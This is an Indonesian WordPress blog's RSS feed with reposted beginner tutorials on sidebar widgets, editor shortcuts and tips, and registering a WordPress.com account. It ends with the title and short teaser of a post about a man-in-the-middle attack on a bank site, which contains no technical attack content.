		<description><![CDATA[Tulisan ini hasil terjemahan bebas dan diadaptasi dari faq.wordpress.com Widget adalah sebuah kotak yang berisi kode-kode di mana anda dapat memindahkan ke dalam sidebar di manapun anda mau Anda dapat menggunakannya untuk personalisasi blog anda dan memperoleh informasi yg anda inginkan hanya dengan melihatnya dari widget sidebar. Dimana letak Widget? Dalam dasbor, klik ‘Tampilan/Presentation’ kemudian [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=360&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span style="color:#ff8040;font-size:x-small;">Tulisan ini hasil terjemahan bebas dan diadaptasi dari <a href="http://faq.wordpress.com/2006/12/24/what-is-a-widget/" target="_blank">faq.wordpress.com</a></span></p>
<p>Widget adalah sebuah kotak yang berisi kode-kode di mana anda dapat memindahkan ke dalam sidebar di manapun anda mau</p>
<p>Anda dapat menggunakannya untuk personalisasi blog anda dan memperoleh informasi yg anda inginkan hanya dengan melihatnya dari widget sidebar.</p>
<p><span style="text-decoration:underline;"><strong>Dimana letak Widget?<br />
</strong></span>Dalam dasbor, klik ‘Tampilan/Presentation’ kemudian alihkan ke submenu maka akan ketemu yang namanya ‘Sidebar Widgets’ atau ‘Widget Kolom Sisi’</p>
<p><span style="text-decoration:underline;"><strong>Cara menggunakan</strong></span><br />
Seret widget ke kolom sisi (sidebar) dari kotak utama widget dan pindahkan, atur peletakkannya sesuai keinginan anda sampai diperoleh layout yg dikehendai.</p>
<p><span style="text-decoration:underline;"><strong>Cara membuka</strong></span></p>
<p>Ketika anda menyeret sebuah widget ke dalam kolom sisi (sidebar) jika widget dapat diubah anda akan melihat ikon kecil kemudian.</p>
<p align="center"><a title="Open a widget" href="http://faq.files.wordpress.com/2006/12/widget1.jpg"><img src="http://faq.files.wordpress.com/2006/12/widget1.jpg?w=500" alt="Open a widget" /></a></p>
<p>Klik lah ikon kecil itu untuk membuka layar widget</p>
<p><span style="text-decoration:underline;"><strong>Mencopot widget dari kolom sisi (siderbar)</strong></span></p>
<p>Seret widget ke dalam kotak utama widgets yang ada di bagian bawah kemudian lepaskan.</p>
<h2 align="center">≈</h2>
<p>Ada 2 tipe widget – ada yang dapat diubah dan ada yang tidak dapat diubah (widget standar).</p>
<p><span style="text-decoration:underline;"><strong>Widget-widget Standar</strong></span><br />
Semua ini akan tampil sama di setiap blog (<em>namanya juga standar khan</em>). Anda hanya dapat memiliki sebuah dari tiap widget ini. Anda tidak dapat mengubah tampilan dan kerjanya.</p>
<ul>
<li>Akismet<br />
Menunjukaan jumlah komentar spam yang berhasil ditangkap oleh Akismet</li>
<li>Archives (Arsip)<br />
Tulisan yang pernah dibuat</li>
<li>Blog stats (Statistik Blog)<br />
<a href="http://faq.wordpress.com/tag/stats/"> Angka yang menunjukkan jumlah pengunjung</a></li>
<li>Calendar (Kalender)<br />
Menampilkan tanggal saat ini, termasuk tanggal saat kita melakukan pengiriman tulisan</li>
<li>Categories (Kategori)<br />
Semua tulisan pada blog yg dikelompokkan dalam kategori. (Ingat – kategori yang kosong tidak ditampilkan)</li>
<li>Links (Tautan)<br />
Tautan Blogroll (Ingat – Tautan yang tidak dikategorikan tidak akan muncul)</li>
<li>Pages (Halaman)<br />
Jika anda ingin menampilkan halaman yang pernah dibuat pada kolom sisi widget. Jika anda ingin mengurutkan halaman yag pernah dibuat, <a href="http://faq.wordpress.com/2006/05/07/can-i-sort-my-pages/">cobalah ini</a>.</li>
<li>Meta<br />
Anda tidak harus menggunakan ini. Anda dapat masuk( log in) pada <a href="http://faq.wordpress.com/2006/05/07/can-i-sort-my-pages/">http://wordpress.com</a> dengan menambahkan <strong>/wp-login.php</strong> ke alamat blog anda. <em>Sebaiknya sih tetep ditampilkan sehingga kalau log ini tinggal klik login saja.</em></li>
<li>Recent Posts (Tulisan Yang Baru lalu)<br />
10 Tulisan yang baru lalu</li>
<li>Recent Comments (Komentar yang baru lalu)<br />
10 komentar yang pernah dibuat di blog anda</li>
<li>Search (Pencarian)<br />
Mengijinkan orang untuk melakukan pencarian berdasarkan kata pada tulisan yang pernah kita buat</li>
<li>Top Posts (Tulisan Teratas)<br />
Tulisan yang paling sering dikunjungi</li>
</ul>
<p><span style="text-decoration:underline;"><strong> Widget yang dapat diubah </strong></span></p>
<p>Dengan widget ini anda dapat meletakkan beberapa informasi yang anda miliki atau dari layanan informasi lain.</p>
<ul>
<li>del.icio.us<br />
Jika anda memiliki layanan dari del.icio.us widget akan serasa sempurna. <em>(maaf kurang ngerti apa maksudnya)</em></li>
<li>Flickr<br />
<a href="http://urip.wordpress.com/2007/02/12/cara-menggunakan-widget-flickr/"> Letakkan gambar yang anda miliki dalam blog anda</a>.</li>
<li>Meebo<a href="http://wordpress.com/blog/2006/08/02/widget-wednesday-meebo-me/"><br />
Ngobrol secara Online lewat blog anda</a></li>
<li>RSS<br />
<a href="http://faq.wordpress.com/2006/12/24/using-the-rss-widget/">Tampilkan informasi dari sumber lain dalam kolom sisi (sidebar) anda<br />
</a></li>
<li>Sonific<br />
<a href="http://faq.wordpress.com/2006/12/11/using-sonific/">Apakah ingin memainkan musik pada blog anda?</a></li>
<li>Text (Teks)<br />
<a href="http://faq.wordpress.com/2006/12/24/using-the-text-widget/"> Kata-kata dan atau gambar yang ingin anda tampilkan</a>.</li>
</ul>
<p><em><strong>Tambahan</strong></em><br />
<em>Setelah melakukan perubahan widget dalam kolom sisi jangan lupa <strong><span style="color:#ff6600;">selalu KLIK tombol Simpan Perubahan</span></strong> yang ada di bagian sudut kanan itu. Mohon koreksi jika ada terjemahan yang kurang tepat.</em></p>
<p>&nbsp;</p>
<p><em>source: http://panduan.wordpress.com/2007/02/18/apa-sih-widget-itu/</em></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/fikforfun.wordpress.com/360/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/fikforfun.wordpress.com/360/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/fikforfun.wordpress.com/360/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/fikforfun.wordpress.com/360/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/fikforfun.wordpress.com/360/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/fikforfun.wordpress.com/360/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/fikforfun.wordpress.com/360/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/fikforfun.wordpress.com/360/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/fikforfun.wordpress.com/360/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/fikforfun.wordpress.com/360/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/fikforfun.wordpress.com/360/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/fikforfun.wordpress.com/360/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/fikforfun.wordpress.com/360/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/fikforfun.wordpress.com/360/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=360&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://fikforfun.wordpress.com/2011/06/14/apa-sih-widget-itu/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://0.gravatar.com/avatar/208ad5118f78b0c91b63181dc9c590a6?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">fikforfun</media:title>
		</media:content>

		<media:content url="http://faq.files.wordpress.com/2006/12/widget1.jpg?w=500" medium="image">
			<media:title type="html">Open a widget</media:title>
		</media:content>
	</item>
		<item>
		<title>Tips Nge-Blog</title>
		<link>http://fikforfun.wordpress.com/2011/06/14/tips-nge-blog/</link>
		<comments>http://fikforfun.wordpress.com/2011/06/14/tips-nge-blog/#comments</comments>
		<pubDate>Tue, 14 Jun 2011 03:48:29 +0000</pubDate>
		<dc:creator>fikforfun</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Tutorial Wordpress]]></category>

		<guid isPermaLink="false">http://fikforfun.wordpress.com/?p=356</guid>
		<description><![CDATA[Buat kita yang awam dan terkendala bahasa untuk “do-blog” dengan wordpress.com, sebaiknya kita berbagi agar pengetahuan se-titik yg kita tahu bisa bermanfaat buat rekan lain yg sedang “do-blog”. Buat Anda yg pemula banget dan pingin punya blog sendiri, barusan (21 Oktober 2006 pukul 3:22 PM) ndapetin Tutorial Bikin Blog di WordPress.com diperuntukkan buat siapa saja [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=356&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p align="justify">Buat kita yang awam dan terkendala bahasa untuk “do-blog” dengan wordpress.com, sebaiknya kita berbagi agar pengetahuan se-titik yg kita tahu bisa bermanfaat buat rekan lain yg sedang “do-blog”.</p>
<p align="justify"><em>Buat Anda yg pemula banget dan pingin punya blog sendiri, barusan (21 Oktober 2006 pukul 3:22 PM) ndapetin Tutorial Bikin Blog di WordPress.com diperuntukkan buat siapa saja yg baru kenal dengan wordpress.com. Siapa saja bisa download dari sumbernya langsung dengan <a title="Saya comot dari davidlama.wordpress.com" href="http://davidlama.files.wordpress.com/2006/09/nge-blog-yuk.pdf" target="_blank">klik di sini.</a> Jika pada link tadi gagal mendownload/membukanya alternatifnya bisa mendownloadnya <a href="http://www.4shared.com/file/8506049/7011c28f/nge-blog-yuk.html" target="_blank">di sini</a>.<a title="Saya comot dari davidlama.wordpress.com" href="http://davidlama.files.wordpress.com/2006/09/nge-blog-yuk.pdf" target="_blank"><br />
</a></em></p>
<p align="justify">Lebih lanjut dari tutorial tersebut, saya tambahkan catatan kecil yg saya buat sesuai dengan pengalaman.</p>
<ol>
<li>
<p align="justify"><strong><span style="color:#ff0000;"> Postingan</span></strong> yang <strong>kelewat panjang</strong> <strong>sebaiknya di putus</strong>, tidak perlu ditampilkan semua. Caranya tempatkan kursor pada bagian kalimat yg ingin diputus lalu <strong>tekan <span style="color:#ff0000;">Alt+T</span></strong>atawa klik tool bar <strong>Rich Text Editor</strong> dengan gambar kertas terpotong (kali yah) .</p>
</li>
<li>
<p align="justify">Jika ingin <span style="color:#ff0000;"><strong>mengganti kata-kata pemutus standar</strong></span>, pindah mode dari mode editor ke mode html trus cari tulisan <span style="color:#ff0000;">&lt;!–more–&gt;</span> (tanda lebih kecil, tanda seru, 2 garis datar, MORE, 2 garis datar, tanda lebih besar) lalu sisipkan kata-kata yg kita kehendaki, misalnya menjadi <span style="color:#ff0000;"><strong>&lt;!–more …baca lebih lanjut–&gt;</strong></span> maka pada bagian pemutus nantinya akan muncul tulisan “…baca lebih lanjut”.</p>
</li>
<li>
<p align="justify">Pakai <strong>shortcut key</strong> juga bisa, kalo pingin tahu pindahkan pointer mos di atas toolbar Rich Text Editor. Tapi bagi yg suka <strong><em>tulisan rata kiri-kanan (justify) pakai shortcut </em><span style="color:#ff0000;">Alt+J</span></strong>karena ini tidak tersedia di toolbar secara langsung.</p>
</li>
<li>
<p align="justify"><strong>Untuk memunculkan/menyembunyikan <span style="color:#ff0000;">Advanced Toolbar </span></strong>pada Rich Text Editor (pemformatan, pewarnaan font, insert karakter khusus, undo-redo, dll) tekan <strong><span style="color:#ff0000;">Alt+V.</span><br />
</strong></p>
</li>
<li><strong><span style="color:#ff0000;">Alt+E</span> </strong>untuk switch antara mode editor dan mode html.</li>
<li>Jika browser yg kita pakai adalah FIREFOx 2.0 biasanya semua fungsi <span style="color:#ff0000;">ALT+…</span> gak berfungsi, maka kombinasi aja dengan Shift menjadi Shift+Alt+…</li>
<li><strong><span style="color:#ff0000;">Shift+Enter</span></strong> untuk menyisipkan baris pemutus dalam paragraph.</li>
<li>
<p align="justify">Tampilan blog sepenuhnya ditentukan oleh <strong><em>theme</em></strong> yg kita pilih. Dari Menu Presentation terdapat sub menu yg ada tergantung dari masing-masing <em>theme</em> yg tersedia. <em>Theme-theme</em> itu ada yg bisa di kostumasi dan ada yg tidak. <a href="http://engtech.wordpress.com/tag/wordpress.com-tips" target="_blank">Untuk review themes2 itu bisa dilihat di sini</a>. Beberapa yg bisa seperti yg saya pakai ini, kita bisa mengganti <em><strong>image header</strong></em> (biasanya ukurannya 730 x 140 pixel) dengan buatan sendiri.</p>
<p align="justify">Kemudian yg kedua adalah submenu <em><strong>Sidebar Widgets</strong></em>, disini kita bisa banyak melakukan kustomasi. Dengan <em>drag and drop widgets</em> bisa dipindahkan ke dalam <em>sidebar</em> kemudian menatanya sesuai kehendak kita.</p>
<p align="justify">Selanjutnya tinggal mengkonfigurasinya dengan klik bagian kanan dari <em>widgets</em>, mengisikan hal2 yg diperlukan. <em>Widgets</em> setiap <em>theme</em> bisa berbeda-beda. Kita juga bisa mengkostumasi <em><strong>TEXT widgets</strong></em> sepenuhnya dengan kata2 atau tag html yg bisa diterima WP.com termasuk membuat link. <em>Widgets</em> yg tersedia maksimal 10 hanya tidak ditampakkan, kita bisa menambahkannya dengan mengisi list pada bagian bawah <em>TEXT WIDGETS</em>. Demikian juga untuk <em><strong>RSS Feed Widgets.</strong></em></p>
</li>
<li>
<p align="justify">Untuk <strong>upload file</strong> (<span style="color:#990000;">misalnya: jpg, jpeg, png, gif, pdf, doc, ppt)</span> masuk ke dashboad, atau bisa langsung klik new post. Lihat bagian bawah rich text editor ada tempat untuk upload file. Klik browse untuk mencari file yg akan di upload dari komputer kita. Isi judul/title dari file yg akan diupload. kalao perlu isikan deskripsi/keterangannya. Langkah berikutnya klik Upload yg ada di bagian kanan bawah deskripsi.<br />
Pastikan anda menjumpai submenu berikutnya, biasanya masuk ke sub menu <strong><span style="color:#ff0000;">cari</span></strong> di bagian upload tadi (ini saya contohkan upload file *.doc). Nah coba tempatkan pointer mouse di atas nama file yg di-upload tadi, klik kanan dan copy linknya. Itulah letak file upload-an tadi. Selanjutnya untuk mengaksesnya bisa dibuatkan link di bagian postingan atau di halaman lain atau di text widgets. Terus anda masih diberi tawaran <em>radio button</em> untuk memilih model link file/page/none dan bisa diedit lagi file tersebut.<br />
Untuk cara upload file gambar bisa dilihat <a href="http://faq.wordpress.com/2006/07/16/how-do-i-upload-pictures/">di sini, di faq-nya WP.com</a></p>
</li>
<li>
<p align="justify">Bila diperlukan kita bisa <strong><span style="color:#ff0000;">back-up blog</span></strong> kita, ini untuk antisipasi kalo suatu saat ada masalah dengan wordpress.com. Caranya <strong><span style="color:#ff0000;">pakai</span></strong> aja software <strong><span style="color:#ff0000;">websitecopier</span></strong> salah satunya seperti <em>WinHTTrack~</em>Graties. Kalau belum punya <a href="http://download.httrack.com/cserv.php3?File=httrack.exe">WinHTTrack bisa download dari sini</a>, untuk <a href="http://download.httrack.com/cserv.php3?File=httrack.tar.gz">under linux downloadnya di sini</a>. Cara pakainya simple aja kok, baca aja di help-nya. <img src="http://urip.wordpress.com/wp-includes/images/smilies/icon_smile.gif?w=570" alt=")" /></p>
</li>
</ol>
<p>&nbsp;</p>
<p><em>source: http://panduan.wordpress.com/2007/02/18/tips-nge-blog/</em></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/fikforfun.wordpress.com/356/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/fikforfun.wordpress.com/356/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/fikforfun.wordpress.com/356/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/fikforfun.wordpress.com/356/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/fikforfun.wordpress.com/356/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/fikforfun.wordpress.com/356/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/fikforfun.wordpress.com/356/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/fikforfun.wordpress.com/356/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/fikforfun.wordpress.com/356/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/fikforfun.wordpress.com/356/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/fikforfun.wordpress.com/356/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/fikforfun.wordpress.com/356/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/fikforfun.wordpress.com/356/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/fikforfun.wordpress.com/356/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=356&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://fikforfun.wordpress.com/2011/06/14/tips-nge-blog/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://0.gravatar.com/avatar/208ad5118f78b0c91b63181dc9c590a6?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">fikforfun</media:title>
		</media:content>

		<media:content url="http://urip.wordpress.com/wp-includes/images/smilies/icon_smile.gif" medium="image">
			<media:title type="html">)</media:title>
		</media:content>
	</item>
		<item>
		<title>Cara Daftar untuk Membuat Blog di WordPress.com</title>
		<link>http://fikforfun.wordpress.com/2011/06/14/cara-daftar-untuk-membuat-blog-di-wordpress-com/</link>
		<comments>http://fikforfun.wordpress.com/2011/06/14/cara-daftar-untuk-membuat-blog-di-wordpress-com/#comments</comments>
		<pubDate>Tue, 14 Jun 2011 03:41:55 +0000</pubDate>
		<dc:creator>fikforfun</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Komputer]]></category>

		<guid isPermaLink="false">http://fikforfun.wordpress.com/?p=354</guid>
		<description><![CDATA[Berikut ini langkah-langkah untuk mendaftarkan diri, mendapatkan akun blog di wordpress.com. Ketikkan ==&#62; id.wordpress.com &#60;== di kotak alamat (addres) di browser anda, terus enter. Menggunakan tulisan “id” agar antar muka (bahasa pengantar) berbahasa Indonesia. Akan muncul halaman seperti dibawah ini. Klik kotak dengan latar biru yang didalamnya tertulis “Mulailah Blog WordPress Anda”. Sesaat kemudian akan [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=354&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Berikut ini langkah-langkah untuk mendaftarkan diri, mendapatkan akun blog di wordpress.com.</p>
<ol>
<li>Ketikkan ==&gt; id.wordpress.com &lt;== di kotak alamat (addres) di browser anda, terus enter. Menggunakan tulisan “id” agar antar muka (bahasa pengantar) berbahasa Indonesia. Akan muncul halaman seperti dibawah ini.
<ul>
<li><a title="daftar1" href="http://panduan.files.wordpress.com/2007/02/daftar-1.jpg"><img src="http://panduan.files.wordpress.com/2007/02/daftar-1.thumbnail.jpg?w=500" alt="daftar1" /></a></li>
</ul>
</li>
<li><strong>Klik</strong> kotak dengan latar biru yang didalamnya tertulis “Mulailah Blog WordPress Anda”. Sesaat kemudian akan terbuka halaman seperti dibawah ini.
<ul>
<li><a title="langkah1" href="http://panduan.files.wordpress.com/2007/02/langkah-1.jpg"><img src="http://panduan.files.wordpress.com/2007/02/langkah-1.thumbnail.jpg?w=500" alt="langkah1" /></a></li>
</ul>
</li>
<li>Ikuti petunjuk yang ada pada halaman ini, Tuliskan nama (ini akan menjadi panduan.wordpress.com jika pada kotak nama pengguna ini diisi panduan) boleh huruf besar atau huruf kecil, gak masalah.<br />
Demikian pula Alamat Emailnya, ini harus alamat email yg masih aktif. Jangan lupa beri tanda centang (check) dengan nge-klik kotak kecil di samping Celotehan Legal. <strong>Klik</strong> <strong>Tombol Berikutnya&gt;&gt;.</strong> Akan muncul halaman seperti di bawah ini.</p>
<ul>
<li><a title="langkah2" href="http://panduan.files.wordpress.com/2007/02/langkah-2.jpg"><img src="http://panduan.files.wordpress.com/2007/02/langkah-2.thumbnail.jpg?w=500" alt="langkah2" /></a></li>
</ul>
<p>Jika nama pengguna sudah terpakai oleh orang lain, anda harus mengganti/mengubah nama pengguna yang diisikan. Perhatikan bagian yang terblok dengan warna merah, itu yang harus diperbaiki.</li>
<li>Otomatis pada kotak Domain Blog: terisi nama pengguna yang diisikan tadi. Isikan Judul Blog: Sesuaikan dengan tema blog yang akan anda pakai. Untuk sementara biarkan saja pilihan bahasa kecuali anda mau pakai bahasa lain. Demikian juga Pribadi, biarkan tercentang agar blog anda bisa dikenali mesin perambah Seperti google atau yg lain. <strong>Klik Tombol Daftar &gt;&gt;</strong> .</li>
<li>Jika pendaftaran anda berhasil maka akan muncul halaman seperti di bawah ini.
<ul>
<li><a title="langkah3" href="http://panduan.files.wordpress.com/2007/02/langkah-3.jpg"><img src="http://panduan.files.wordpress.com/2007/02/langkah-3.thumbnail.jpg?w=500" alt="langkah3" /></a></li>
</ul>
<p>Selanjutnya anda bisa mengisi profil anda. Sebenarnya gak usah diisi dulu juga tidak papa, bisa diperbahurui nanti. Tapi yah tidak ada salahnya diisi juga, sambil nunggu proses pengiriman ke email anda dari wordpress untuk mendapatkan kode aktifasi. Silahkan Simpan Profil Anda.</li>
<li>Buka kotak masuk di alamat email anda. Contohnya seperti di email saya seperti ini.
<ul>
<li><a title="email" href="http://panduan.files.wordpress.com/2007/02/langkah-4-aktifasi-dari-email.jpg"><img src="http://panduan.files.wordpress.com/2007/02/langkah-4-aktifasi-dari-email.thumbnail.jpg?w=500" alt="email" /></a></li>
</ul>
<p>Selanjutnya Ikuti petunjuk dengan meng- klik link yang diberikan untuk mengaktifasi blog yang dibuat.</li>
<li>Sampai di sini anda akan diberikan password, jangan lupa kopi/salin password untuk login.
<ul>
<li><a title="pswpertama" href="http://panduan.files.wordpress.com/2007/02/loginpertama.JPG"><img src="http://panduan.files.wordpress.com/2007/02/loginpertama.thumbnail.JPG?w=500" alt="pswpertama" /></a></li>
</ul>
<p>Klik Login untuk siap-siap masuk ke blog anda.</li>
<li>Jika login berhasil seharusnya anda dihadapkan ke layar di mana pada bagian layar tadi terdapat bagian seperti pada gambar ini.
<ul>
<li><a title="loghasl" href="http://panduan.files.wordpress.com/2007/02/login-berhasil.JPG"><img src="http://panduan.files.wordpress.com/2007/02/login-berhasil.thumbnail.JPG?w=500" alt="loghasl" /></a></li>
</ul>
<p>Klik saja nama blog anda itu. sampai anda di bawa ke dashboard.</li>
<li>Langkah selanjutnya adalah mengubah password sehingga mudah diingat. Klik My Profil bagian pojok kanan atas.<br />
<a title="ganti psw" href="http://panduan.files.wordpress.com/2007/02/ganti-password-lagi.JPG"><img src="http://panduan.files.wordpress.com/2007/02/ganti-password-lagi.thumbnail.JPG?w=500" alt="ganti psw" /></a></p>
<p>Selanjutnya sekalian ubah bahasa antarmuka (Interface language) ke bahasa Indonesia. Klik Save Changes. Jika berhasil maka bahasa interfacenya berubah menjadi bahasa Indonesia.</li>
<li>Sampai di sini anda telah berhasil memiliki blog, selanjutnya bisa dimodifikasi lewat dasbor, termasuk mengisi blog anda nantinya.</li>
</ol>
<p>Untuk selanjutnya jika anda hendak masuk ke blog anda ada beberapa pilihan yang bisa ditempuh:</p>
<ul>
<li>Ketikkan alamat blog anda di address browser: Misalnya “panduan.wordpress.com” (tanpa tanda petik), jika telah terbuka, silahkan klik login dibagian kolom sisi blog anda. Isikan nama dan password, klik login.</li>
<li>Pada address browser anda ketikkan saja wordpress.com/wp-admin, setelah terbuka sebuah halaman, disitu isikan nama dan password dan klik login.</li>
<li>Ketikkan pada address browser “wordpress.com” begitu halaman terbuka, isikan nama dan password dibagian kotak yang tersedia, klik login.</li>
</ul>
<p><strong>Untuk anda yang berniat membuat blog di wordpress.com dan memerlukan panduan silahkan mendownloadnya <a href="http://files.openomy.com/public/mr.urip/cara%20daftar%20di%20wodrpress.pdf" target="_blank">dari di sini.</a></strong></p>
<p>&nbsp;</p>
<p><em>source: http://panduan.wordpress.com/2007/02/18/cara-mendaftar-untuk-membuat-blog-di-wordpresscom/</em></p>
<p>&nbsp;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/fikforfun.wordpress.com/354/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/fikforfun.wordpress.com/354/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/fikforfun.wordpress.com/354/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/fikforfun.wordpress.com/354/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/fikforfun.wordpress.com/354/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/fikforfun.wordpress.com/354/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/fikforfun.wordpress.com/354/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/fikforfun.wordpress.com/354/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/fikforfun.wordpress.com/354/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/fikforfun.wordpress.com/354/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/fikforfun.wordpress.com/354/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/fikforfun.wordpress.com/354/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/fikforfun.wordpress.com/354/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/fikforfun.wordpress.com/354/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=354&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://fikforfun.wordpress.com/2011/06/14/cara-daftar-untuk-membuat-blog-di-wordpress-com/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://0.gravatar.com/avatar/208ad5118f78b0c91b63181dc9c590a6?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">fikforfun</media:title>
		</media:content>

		<media:content url="http://panduan.files.wordpress.com/2007/02/daftar-1.thumbnail.jpg?w=500" medium="image">
			<media:title type="html">daftar1</media:title>
		</media:content>

		<media:content url="http://panduan.files.wordpress.com/2007/02/langkah-1.thumbnail.jpg?w=500" medium="image">
			<media:title type="html">langkah1</media:title>
		</media:content>

		<media:content url="http://panduan.files.wordpress.com/2007/02/langkah-2.thumbnail.jpg?w=500" medium="image">
			<media:title type="html">langkah2</media:title>
		</media:content>

		<media:content url="http://panduan.files.wordpress.com/2007/02/langkah-3.thumbnail.jpg?w=500" medium="image">
			<media:title type="html">langkah3</media:title>
		</media:content>

		<media:content url="http://panduan.files.wordpress.com/2007/02/langkah-4-aktifasi-dari-email.thumbnail.jpg?w=500" medium="image">
			<media:title type="html">email</media:title>
		</media:content>

		<media:content url="http://panduan.files.wordpress.com/2007/02/loginpertama.thumbnail.JPG?w=500" medium="image">
			<media:title type="html">pswpertama</media:title>
		</media:content>

		<media:content url="http://panduan.files.wordpress.com/2007/02/login-berhasil.thumbnail.JPG?w=500" medium="image">
			<media:title type="html">loghasl</media:title>
		</media:content>

		<media:content url="http://panduan.files.wordpress.com/2007/02/ganti-password-lagi.thumbnail.JPG?w=500" medium="image">
			<media:title type="html">ganti psw</media:title>
		</media:content>
	</item>
		<item>
		<title>MITM Attack on Mandiri Internet Banking using SSLStrip</title>
		<link>http://fikforfun.wordpress.com/2011/06/14/mitm-attack-on-mandiri-internet-banking-using-sslstrip/</link>
		<comments>http://fikforfun.wordpress.com/2011/06/14/mitm-attack-on-mandiri-internet-banking-using-sslstrip/#comments</comments>
		<pubDate>Mon, 13 Jun 2011 18:21:10 +0000</pubDate>
		<dc:creator>fikforfun</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://fikforfun.wordpress.com/?p=351</guid>
		<description><![CDATA[Https (http over SSL) sebenarnya adalah protokol yang sangat aman, protokol ini menjamin keamanan data dari browser hingga web server. MITM attack (man in the middle) tidak bisa dilakukan terhadap https karena https memiliki fitur authentication sehingga attacker tidak bisa menyamar sebagai web server. Walaupun mitm attack tidak bisa dilakukan terhadap https, namun attacker tetap [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=351&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
